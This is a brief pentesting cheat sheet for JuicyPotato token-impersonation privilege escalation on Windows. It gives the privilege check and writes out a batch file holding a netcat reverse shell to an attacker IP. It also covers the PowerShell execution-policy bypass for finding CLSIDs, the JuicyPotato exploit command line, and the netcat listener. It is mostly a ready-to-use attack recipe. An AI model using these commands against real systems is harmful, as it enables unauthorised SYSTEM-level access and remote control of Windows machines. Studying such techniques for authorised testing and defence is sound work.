# Juicypotato

## Juicypotato

* Check for ***SeImpersonatePrivilege*** or ***SeAssignPrimaryTokenPrivilege*** if enabled through whoami /priv or whoami /all
* Requirement

  * Potato exe <https://github.com/ohpe/juicy-potato/releases> Note: there other exe also other than juicypotato like rotten potato, sweet potato, etc which can be used under certain circumstances <https://jlajara.gitlab.io/Potatoes_Windows_Privesc>
  * Create priv.bat foe reverse privilege shell echo “C:\Windows\Tasks\nc.exe -e cmd.exe \<attacker ip> \<port>” > priv.bat
  * transfer nc.exe **/usr/share/windows-resources/binaries/nc.exe**
  * script **GetCLSID.ps1** for finding **CLSID** <https://ohpe.it/juicy-potato/CLSID/> powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt Sometime CLSID is not required

  Transfer all file on window host
* Exploit
  * .\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t \* -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E} -l for listening port same as in priv.bat , -c for clsid
  * nc -nvlp 4444
* Reference

  <https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505>

  <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato>